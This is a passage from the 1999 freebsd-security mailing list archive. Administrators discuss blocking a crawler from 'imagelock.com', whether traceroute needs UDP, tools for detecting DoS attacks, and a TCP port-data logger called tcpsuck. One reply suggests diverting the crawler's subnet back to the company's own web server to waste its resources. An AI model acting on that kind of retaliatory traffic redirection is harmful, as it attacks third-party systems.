In-Reply-To: Your message of "Mon, 24 May 1999 10:03:17 -0600"
References: <199905241603.KAA11763@mt.sri.com>
X-Mailer: Mew version 1.05+ on Emacs 19.34.2
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Date: Mon, 24 May 1999 18:08:15 +0200
Message-ID: <32724.927562095@verdi.nethelp.no>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> DES, you don't know what you're talking about. A ping doesn't require
> UDP, but traceroute certainly does.

DES pointed out that the current FreeBSD traceroute doesn't require UDP,
but can also run over TCP. This is certainly a valid point, but since the
traceroute that *most* users will have access to does indeed use UDP, I'd
say that "bullshit" is a bit too strong...

Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Mon May 24 9: 9:23 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 7877115469 for ; Mon, 24 May 1999 09:09:20 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id KAA04281; Mon, 24 May 1999 10:03:42 -0600 (MDT)
Message-Id: <4.2.0.37.19990524100208.04727460@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Mon, 24 May 1999 10:03:38 -0600
To: Poul-Henning Kamp , Michael Richards <026809r@dragon.acadiau.ca>
From: Brett Glass
Subject: Re: Denial of service attack from "imagelock.com"
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <11146.927527966@critter.freebsd.dk>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I like this idea. BUT.... You'll still get their SYNs and use up kernel
memory. (Only the OUTBOUND packets will disappear into a black hole.)
memory for awhile. Any way to filter the incoming ones without installing
a full-up firewall?

--Brett

At 08:39 AM 5/24/99 +0200, Poul-Henning Kamp wrote:
>In message , Michael Richards
>writes:
> >On Sun, 23 May 1999, Brett Glass wrote:
> >
> >> The Webmasters on this list may want to look over their logs to see
> >> if they've been hit and not known it. grep your logs for imagelock.com;
> >> if you find that they're abusing your server, you may want to firewall
> >I noticed we were hit by them this evening. 1250 requests in a few
> >minutes. Since we're not running a firewall, is there a recommended method
> >of filtering such people out? I think I did it with apache, but I'm
> >wondering if there is a better method.
>
>Add a blackhole route to them:
>
>   route add -net -netmask 127.0.0.1 -blackhole
>
>--
>Poul-Henning Kamp             FreeBSD coreteam member
>phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
>FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Mon May 24 9:37:28 1999
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 27CC714E41 for ; Mon, 24 May 1999 09:37:25 -0700 (PDT) (envelope-from des@flood.ping.uio.no)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id SAA90838; Mon, 24 May 1999 18:37:19 +0200 (CEST) (envelope-from des)
To: Nate Williams
Cc: Dag-Erling Smorgrav , "Bert Kellerman" , "Matthew Dillon" ,
Subject: Re: Denial of service attack from "imagelock.com"
References: <4.2.0.37.19990522105949.0465d4a0@localhost> <199905221714.KAA74179@apollo.backplane.com> <009401bea570$09546a80$5f64a8c0@crackhouse.com> <199905241603.KAA11763@mt.sri.com>
From: Dag-Erling Smorgrav
Date: 24 May 1999 18:37:18 +0200
In-Reply-To: Nate Williams's message of "Mon, 24 May 1999 10:03:17 -0600"
Message-ID:
Lines: 13
X-Mailer: Gnus v5.5/Emacs 19.34
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Nate Williams writes:
> > "Bert Kellerman" writes:
> > > You need UDP connectivity to perform a successful traceroute from a UNIX
> > > client..not TCP. [...]
> > Bullshit. RTFM.
> DES, you don't know what you're talking about. A ping doesn't require
> UDP, but traceroute certainly does.

No it does not. At least not in -current.

DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Mon May 24 9:44:55 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ns.mt.sri.com (sri-gw.MT.net [206.127.105.141]) by hub.freebsd.org (Postfix) with ESMTP id 8B3CB154D4 for ; Mon, 24 May 1999 09:44:51 -0700 (PDT) (envelope-from nate@mt.sri.com)
Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id KAA10019; Mon, 24 May 1999 10:44:44 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com)
Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id KAA12091; Mon, 24 May 1999 10:44:43 -0600
Date: Mon, 24 May 1999 10:44:43 -0600
Message-Id: <199905241644.KAA12091@mt.sri.com>
From: Nate Williams
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: Dag-Erling Smorgrav
Cc: Nate Williams , "Bert Kellerman" , "Matthew Dillon" ,
Subject: Re: Denial of service attack from "imagelock.com"
In-Reply-To:
References: <4.2.0.37.19990522105949.0465d4a0@localhost> <199905221714.KAA74179@apollo.backplane.com> <009401bea570$09546a80$5f64a8c0@crackhouse.com> <199905241603.KAA11763@mt.sri.com>
X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > > > You need UDP connectivity to perform a successful traceroute from a UNIX
> > > > client..not TCP. [...]
> > > Bullshit. RTFM.
> > DES, you don't know what you're talking about. A ping doesn't require
> > UDP, but traceroute certainly does.
>
> No it does not. At least not in -current.

-current is not used by very many folks (it certainly should not be used
by anyone in production environments) and non-UDP traceroute is only
used by a few OS's.

Nate

From owner-freebsd-security Mon May 24 9:59:48 1999
Delivered-To: freebsd-security@freebsd.org
Received: from brooklyn.slack.net (brooklyn.slack.net [206.41.21.102]) by hub.freebsd.org (Postfix) with ESMTP id DED1B14D32 for ; Mon, 24 May 1999 09:59:44 -0700 (PDT) (envelope-from andrewr@brooklyn.slack.net)
Received: from localhost (andrewr@localhost) by brooklyn.slack.net (8.8.7/8.8.7) with SMTP id NAA21347; Mon, 24 May 1999 13:04:27 -0400 (EDT)
Date: Mon, 24 May 1999 13:04:26 -0400 (EDT)
From: andrewr
To: Terry Warner
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Monitering
In-Reply-To: <199905241407.KAA02587@www.netlabs.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Well there is Network Flight Recorder (NFR).. Check that out.

www.nfr.net

Andrew

On Mon, 24 May 1999, Terry Warner wrote:

> Can anyone recommend a good system monitor .. for like detecting DoS attacks and such .. and which can log to files?
>
> if so please get back to me .. Thank you
>
> Terry Warner

From owner-freebsd-security Mon May 24 10: 2:26 1999
Delivered-To: freebsd-security@freebsd.org
Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 439F314C35 for ; Mon, 24 May 1999 10:02:20 -0700 (PDT) (envelope-from sthaug@nethelp.no)
Received: (qmail 33878 invoked by uid 1001); 24 May 1999 17:02:19 +0000 (GMT)
To: nate@mt.sri.com
Cc: security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
From: sthaug@nethelp.no
In-Reply-To: Your message of "Mon, 24 May 1999 10:44:43 -0600"
References: <199905241644.KAA12091@mt.sri.com>
X-Mailer: Mew version 1.05+ on Emacs 19.34.2
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Date: Mon, 24 May 1999 19:02:19 +0200
Message-ID: <33876.927565339@verdi.nethelp.no>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> -current is not used by very many folks (it certainly should not be used
> by anyone in production environments) and non-UDP traceroute is only
> used by a few OS's.

Checking some more I see that it has actually been MFCed, so the non-UDP
version is also in 3.2-STABLE (but not in 3.2-RELEASE).

Anybody know of other OSes that have the non-UDP version? (Excluding
Windows, of course, which has been based on ICMP all the time, AFAIK).

Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Mon May 24 10:37:22 1999
Delivered-To: freebsd-security@freebsd.org
Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6]) by hub.freebsd.org (Postfix) with ESMTP id 08C3314EB3 for ; Mon, 24 May 1999 10:37:05 -0700 (PDT) (envelope-from kernel@tdnet.com.br)
Received: from tdnet.com.br [200.236.148.196] by guepardo.vicosa.com.br with ESMTP (SMTPD32-5.00) id A0A1C201F2; Mon, 24 May 1999 14:47:13 -0300
Message-ID: <374963F1.40801C41@tdnet.com.br>
Date: Mon, 24 May 1999 14:36:33 +0000
From: Unknow User
X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386)
MIME-Version: 1.0
To: Kris Kennaway
Cc: freebsd-security@freebsd.org
Subject: Re: user uses xv3.10a (PNG) to halt my system.
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Kris Kennaway wrote:

> This question was already answered on freebsd-hackers. Why are you asking
> again here?

1) I don't sign up to 100 mailing lists!
2) If I did, I did not know this question was already answered!
3) I am sorry if I made a mistake!

--
"The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD."

From owner-freebsd-security Mon May 24 11:18: 6 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 3789014D00 for ; Mon, 24 May 1999 11:18:01 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA80501; Mon, 24 May 1999 12:16:40 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA20443; Mon, 24 May 1999 12:17:08 -0600 (MDT)
Message-Id: <199905241817.MAA20443@harmony.village.org>
To: ark@eltex.ru
Subject: Re: Server trying to connect to Port 113
Cc: freebsd-security@FreeBSD.ORG, des@flood.ping.uio.no
In-reply-to: Your message of "Mon, 24 May 1999 18:44:07 +0400." <199905241444.SAA23381@paranoid.eltex.spb.ru>
References: <199905241444.SAA23381@paranoid.eltex.spb.ru>
Date: Mon, 24 May 1999 12:17:08 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <199905241444.SAA23381@paranoid.eltex.spb.ru> ark@eltex.ru writes:
: Netbios session service, yes. Netbios datagram/name service, no.

We have 204.144.255.x and constantly get traffic from cretins who think
that the proper netmask for the 204 net is 255.255.0.0. We get it every
time a new NT/Win box is placed online at one of the clients of our ISP. :-(

Warner

From owner-freebsd-security Mon May 24 11:33: 7 1999
Delivered-To: freebsd-security@freebsd.org
Received: from wopr.caltech.edu (wopr.caltech.edu [131.215.240.222]) by hub.freebsd.org (Postfix) with ESMTP id E974514D7F for ; Mon, 24 May 1999 11:33:00 -0700 (PDT) (envelope-from mph@wopr.caltech.edu)
Received: (from mph@localhost) by wopr.caltech.edu (8.9.3/8.9.1) id LAA14100; Mon, 24 May 1999 11:32:23 -0700 (PDT) (envelope-from mph)
Date: Mon, 24 May 1999 11:32:23 -0700
From: Matthew Hunt
To: Unknow User
Cc: Kris Kennaway , freebsd-security@FreeBSD.ORG
Subject: Re: user uses xv3.10a (PNG) to halt my system.
Message-ID: <19990524113222.B13871@wopr.caltech.edu>
References: <374963F1.40801C41@tdnet.com.br>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.4i
In-Reply-To: <374963F1.40801C41@tdnet.com.br>; from Unknow User on Mon, May 24, 1999 at 02:36:33PM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, May 24, 1999 at 02:36:33PM +0000, Unknow User wrote:

> 1) I don't sign up to 100 mailing lists!
> 2) If I did, I did not know this question was already answered!
> 3) I am sorry if I made a mistake!

Before posting a question, you should search the mailing list archives
at www.freebsd.org to see if it has already been addressed. That way,
you don't need to subscribe to a lot of lists, but you can still check
to see whether your problem has already been solved.

Matt

--
Matthew Hunt  * Stay close to the Vorlon.
http://www.pobox.com/~mph/ *

From owner-freebsd-security Mon May 24 11:34:31 1999
Delivered-To: freebsd-security@freebsd.org
Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 5885815122 for ; Mon, 24 May 1999 11:34:26 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com)
Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id LAA03178; Mon, 24 May 1999 11:33:07 -0700 (PDT)
Message-ID: <19990524113306.A29468@best.com>
Date: Mon, 24 May 1999 11:33:06 -0700
From: "Jan B. Koum "
To: sthaug@nethelp.no, nate@mt.sri.com
Cc: security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
References: <199905241644.KAA12091@mt.sri.com> <33876.927565339@verdi.nethelp.no>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <33876.927565339@verdi.nethelp.no>; from sthaug@nethelp.no on Mon, May 24, 1999 at 07:02:19PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, May 24, 1999 at 07:02:19PM +0200, sthaug@nethelp.no wrote:
> > -current is not used by very many folks (it certainly should not be used
> > by anyone in production environments) and non-UDP traceroute is only
> > used by a few OS's.
>
> Checking some more I see that it has actually been MFCed, so the non-UDP
> version is also in 3.2-STABLE (but not in 3.2-RELEASE).
>
> Anybody know of other OSes that have the non-UDP version? (Excluding
> Windows, of course, which has been based on ICMP all the time, AFAIK).
>
> Steinar Haug, Nethelp consulting, sthaug@nethelp.no

Actually 3.2-STABLE uses the UDP version by default. Look:

foo% traceroute nau
traceroute to nautilus.yahoo.com (206.132.89.24), 30 hops max, 40 byte packets
 1  nautilus (206.132.89.24)  0.332 ms  0.283 ms  0.234 ms

nautilus% !!
tcpdump host foo and not port 22
tcpdump: listening on fxp0
11:30:03.082728 foo.yahoo.com.34556 > nautilus.yahoo.com.33435: udp 12 [ttl 1]
11:30:03.082817 nautilus.yahoo.com > foo.yahoo.com: icmp: nautilus.yahoo.com udp port 33435 unreachable
11:30:03.085415 foo.yahoo.com.34556 > nautilus.yahoo.com.33436: udp 12 [ttl 1]
11:30:03.085488 nautilus.yahoo.com > foo.yahoo.com: icmp: nautilus.yahoo.com udp port 33436 unreachable
11:30:03.085824 foo.yahoo.com.34556 > nautilus.yahoo.com.33437: udp 12 [ttl 1]
11:30:03.085877 nautilus.yahoo.com > foo.yahoo.com: icmp: nautilus.yahoo.com udp port 33437 unreachable

BTW, would be nice to put traceroute 1.4 into /usr/src/contrib .. it has
support for icmp only traceroute (-I) which is IMHO cool. ;)

-- Yan

From owner-freebsd-security Mon May 24 12:30:10 1999
Delivered-To: freebsd-security@freebsd.org
Received: from andyo.prime.net (P1M2.prime.net.ua [195.64.229.34]) by hub.freebsd.org (Postfix) with ESMTP id 17B3615200 for ; Mon, 24 May 1999 12:29:10 -0700 (PDT) (envelope-from andyo@prime.net.ua)
Received: from prime.net.ua (localhost [127.0.0.1]) by andyo.prime.net (8.9.3/8.9.3) with ESMTP id WAA00522; Mon, 24 May 1999 22:29:01 +0300 (EET DST)
Message-ID: <3749A86D.59F4FDB0@prime.net.ua>
Date: Mon, 24 May 1999 22:28:45 +0300
From: Андрей В. Олейник (Andy V. Oleynik)
Reply-To: andyo@prime.net.ua
Organization: М-Инфо
X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.5-RELEASE i386)
X-Accept-Language: ru, uk, en
MIME-Version: 1.0
To: Terry Warner
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Monitering
References: <199905241407.KAA02587@www.netlabs.net>
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Trafshow IMHO is simplest & the best against DoS.

Terry Warner wrote:

> Can anyone recommend a good system monitor .. for like detecting DoS attacks and such .. and which can log to files?
>
> if so please get back to me .. Thank you
>
> Terry Warner

--
Andy V. Oleynik
(When U aim for perfection, U discover it's a moving target)

From owner-freebsd-security Mon May 24 13: 4:38 1999
Delivered-To: freebsd-security@freebsd.org
Received: from quaggy.ursine.com (lambda.blueneptune.com [209.133.45.179]) by hub.freebsd.org (Postfix) with ESMTP id 338F414E98 for ; Mon, 24 May 1999 13:04:35 -0700 (PDT) (envelope-from fbsd-security@ursine.com)
Received: from michael (lambda.ursine.com [209.133.45.69]) by quaggy.ursine.com (8.9.2/8.9.2) with ESMTP id NAA31537; Mon, 24 May 1999 13:04:11 -0700 (PDT) (envelope-from fbsd-security@ursine.com)
Message-ID: <199905241304140770.135F6CF4@quaggy.ursine.com>
In-Reply-To: <4.2.0.37.19990524092545.0474cd50@localhost>
References: <199905231424140440.0E81E3D5@quaggy.ursine.com> <4.2.0.37.19990523191423.04639500@localhost> <4.2.0.37.19990524092545.0474cd50@localhost>
X-Mailer: Calypso Version 3.00.00.13 (2)
Date: Mon, 24 May 1999 13:04:14 -0700
From: "Michael Bryan"
To: "Brett Glass" , "Joao Assad" , freebsd-security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>So much for the 3-10 minutes they claim!

I thought they claimed 3 seconds to 10 minutes?

Michael Bryan
fbsd-security@ursine.com

From owner-freebsd-security Mon May 24 19:13:32 1999
Delivered-To: freebsd-security@freebsd.org
Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id 3CE8A154C6 for ; Mon, 24 May 1999 19:13:26 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au)
Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id MAA02815 for freebsd-security@FreeBSD.ORG; Tue, 25 May 1999 12:13:26 +1000 (EST) (envelope-from wkt)
From: Warren Toomey
Message-Id: <199905250213.MAA02815@henry.cs.adfa.edu.au>
Subject: TCP connect data logger
To: freebsd-security@FreeBSD.ORG
Date: Tue, 25 May 1999 12:13:26 +1000 (EST)
Reply-To: wkt@cs.adfa.edu.au
X-Mailer: ELM [version 2.4ME+ PL43 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

This is strictly off-topic for FreeBSD, but anyway ... A few people desired
to know why someone was attacking port X on their box. Ages ago, I wrote a
small program, tcpsuck, that is run from inetd. Tcpsuck sits on a port and
logs the data coming in. It stops after a pre-defined timeout, or when the
remote end breaks the connection.

This can help you to determine what they are looking for. It also slows
TCP port strobe attacks, too :-)

Here is where I use it on my system:

bootserver stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
cisco-tna stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
exec stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
cmd stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
nicname stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
pop2 stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
pop3 stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
imap2 stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
supdup stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
systat stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
tcpmux stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
login stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
shell stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck

I also wrote a udpsuck program for UDP ports, but current FreeBSD versions
have UDP packet logging built-in.

Anybody interested in tcpsuck?

Warren

From owner-freebsd-security Mon May 24 21:11:19 1999
Delivered-To: freebsd-security@freebsd.org
Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id 2F33E15063 for ; Mon, 24 May 1999 21:11:14 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au)
Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id OAA03063 for security@freebsd.org; Tue, 25 May 1999 14:11:08 +1000 (EST) (envelope-from wkt)
From: Warren Toomey
Message-Id: <199905250411.OAA03063@henry.cs.adfa.edu.au>
Subject: Location of TCP/UDP packet suckers
To: security@freebsd.org
Date: Tue, 25 May 1999 14:11:08 +1000 (EST)
Reply-To: wkt@cs.adfa.edu.au
X-Mailer: ELM [version 2.4ME+ PL43 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Well, I got a large response back from my offer of a TCP connection logger.
Yes, I should have just offered the URL straightaway! You can get the
source at:

ftp://minnie.cs.adfa.edu.au/pub/NetSecurity/pktsuckers.tar.gz

They were last modified January 1996. I could think of some extra
functionality, e.g. to ignore broadcast UDP packets, or packets from the
local subnet, but I haven't bothered.

Hope you find them useful. They compile under FreeBSD 3.x, and should be
easily ported to most other Unix flavours.

Cheers,
Warren

From owner-freebsd-security Mon May 24 21:14:21 1999
Delivered-To: freebsd-security@freebsd.org
Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id 2ED5015063 for ; Mon, 24 May 1999 21:14:17 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au)
Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id OAA03109; Tue, 25 May 1999 14:14:06 +1000 (EST) (envelope-from wkt)
From: Warren Toomey
Message-Id: <199905250414.OAA03109@henry.cs.adfa.edu.au>
Subject: Re: TCP connect data logger
In-Reply-To: <19990525000758.A14670@fw.garman.net> from Jason Garman at "May 25, 1999 0: 7:58 am"
To: garman@earthling.net
Date: Tue, 25 May 1999 14:14:06 +1000 (EST)
Cc: security@freebsd.org
Reply-To: wkt@cs.adfa.edu.au
X-Mailer: ELM [version 2.4ME+ PL43 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In article by Jason Garman:
> also, how does one enable the UDP packet logging in recent FreeBSD's?

The sysctl net.inet.udp.log_in_vain option seems to be the one.
Maybe it doesn't log the contents, just some of the headers.
I haven't used it yet.

Warren

From owner-freebsd-security Mon May 24 21:20:10 1999
Delivered-To: freebsd-security@freebsd.org
Received: from pop03.globecomm.net (pop03.globecomm.net [206.253.130.65]) by hub.freebsd.org (Postfix) with ESMTP id 4FDD515063 for ; Mon, 24 May 1999 21:20:01 -0700 (PDT) (envelope-from jschwab@royal.net)
Received: from usr15-dialup51.mix1.Irving.cw.net (usr15-dialup51.mix1.Irving.cw.net [166.62.215.51]) by pop03.globecomm.net (8.9.0/8.8.0) with ESMTP id AAA04176; Tue, 25 May 1999 00:19:44 -0400 (EDT)
Date: Mon, 24 May 1999 22:17:03 -0600 (MDT)
From: "Jason L. Schwab"
X-Sender: jschwab@shellsys.net
To: wkt@cs.adfa.edu.au
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: TCP connect data logger
In-Reply-To: <199905250213.MAA02815@henry.cs.adfa.edu.au>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Yes, I'm interested in it! Sounds like something I could use!

-------------------------------------
Jason L. Schwab * Unix System Administrator *
-------------------------------------

On Tue, 25 May 1999, Warren Toomey wrote:

> This is strictly off-topic for FreeBSD, but anyway ... A few people desired
> to know why someone was attacking port X on their box. Ages ago, I wrote a
> small program, tcpsuck, that is run from inetd. Tcpsuck sits on a port and
> logs the data coming in. It stops after a pre-defined timeout, or when the
> remote end breaks the connection.
>
> This can help you to determine what they are looking for. It also slows
> TCP port strobe attacks, too :-)
>
> Here is where I use it on my system:
>
> bootserver stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
> cisco-tna stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
> exec stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
> cmd stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
> nicname stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
> pop2 stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
> pop3 stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
> imap2 stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
> supdup stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
> systat stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
> tcpmux stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
> login stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
> shell stream tcp nowait nobody /usr/libexec/tcpsuck tcpsuck
>
> I also wrote a udpsuck program for UDP ports, but current FreeBSD versions
> have UDP packet logging built-in.
>
> Anybody interested in tcpsuck?
>
> Warren

From owner-freebsd-security Mon May 24 21:30:23 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gndrsh.aac.dev.com (unknown [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 0395F14E91 for ; Mon, 24 May 1999 21:30:15 -0700 (PDT) (envelope-from rgrimes@gndrsh.aac.dev.com)
Received: (from rgrimes@localhost) by gndrsh.aac.dev.com (8.9.3/8.9.3) id VAA08832; Mon, 24 May 1999 21:24:16 -0700 (PDT) (envelope-from rgrimes)
From: "Rodney W. Grimes"
Message-Id: <199905250424.VAA08832@gndrsh.aac.dev.com>
Subject: Re: Denial of service attack from "imagelock.com"
In-Reply-To: <4.2.0.37.19990524100208.04727460@localhost> from Brett Glass at "May 24, 1999 10:03:38 am"
To: brett@lariat.org (Brett Glass)
Date: Mon, 24 May 1999 21:24:16 -0700 (PDT)
Cc: phk@critter.freebsd.dk (Poul-Henning Kamp), 026809r@dragon.acadiau.ca (Michael Richards), freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> I like this idea. BUT.... You'll still get their SYNs and use up kernel
> memory. (Only the OUTBOUND packets will disappear into a black hole.)
> memory for awhile. Any way to filter the incoming ones without installing
> a full-up firewall?

Yea, but they aren't going to crawl very far around your website when it
looks like you're not responding. Also it should consume their resources
at least a little bit, and I LIKE THAT IDEA!!!

Hummm... lets see.. how can I consume more of their resources and less of
mine.... ahhh. got it... ipdivert 209.133.111.0/24 www.imagelock.com.
Yea, that outa confuse the snot out of them....... and if they change IP's
it'll still get em :-)

> --Brett
>
> At 08:39 AM 5/24/99 +0200, Poul-Henning Kamp wrote:
> >In message , Michael Richards
> >writes:
> > >On Sun, 23 May 1999, Brett Glass wrote:
> > >
> > >> The Webmasters on this list may want to look over their logs to see
> > >> if they've been hit and not known it. grep your logs for imagelock.com;
> > >> if you find that they're abusing your server, you may want to firewall
> > >I noticed we were hit by them this evening. 1250 requests in a few
> > >minutes. Since we're not running a firewall, is there a recommended method
> > >of filtering such people out? I think I did it with apache, but I'm
> > >wondering if there is a better method.
> >
> >Add a blackhole route to them:
> >
> >   route add -net -netmask 127.0.0.1 -blackhole
> >
> >--
> >Poul-Henning Kamp             FreeBSD coreteam member
> >phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
> >FreeBSD -- It will take a long time before progress goes too far!

--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.aac.dev.com
Accurate Automation, Inc.   Reliable computers for FreeBSD   http://www.aai.dnsmgr.com

From owner-freebsd-security Mon May 24 22:20:57 1999
Delivered-To: freebsd-security@freebsd.org
Received: from wedgie.org (pm510-09.dialip.mich.net [131.118.249.231]) by hub.freebsd.org (Postfix) with ESMTP id 5D64314DF1 for ; Mon, 24 May 1999 22:20:40 -0700 (PDT) (envelope-from jgarman@wedgie.org)
Received: by wedgie.org (Postfix, from userid 1000) id 7E2661FF01; Tue, 25 May 1999 01:20:33 -0400 (EDT)
Date: Tue, 25 May 1999 01:20:33 -0400
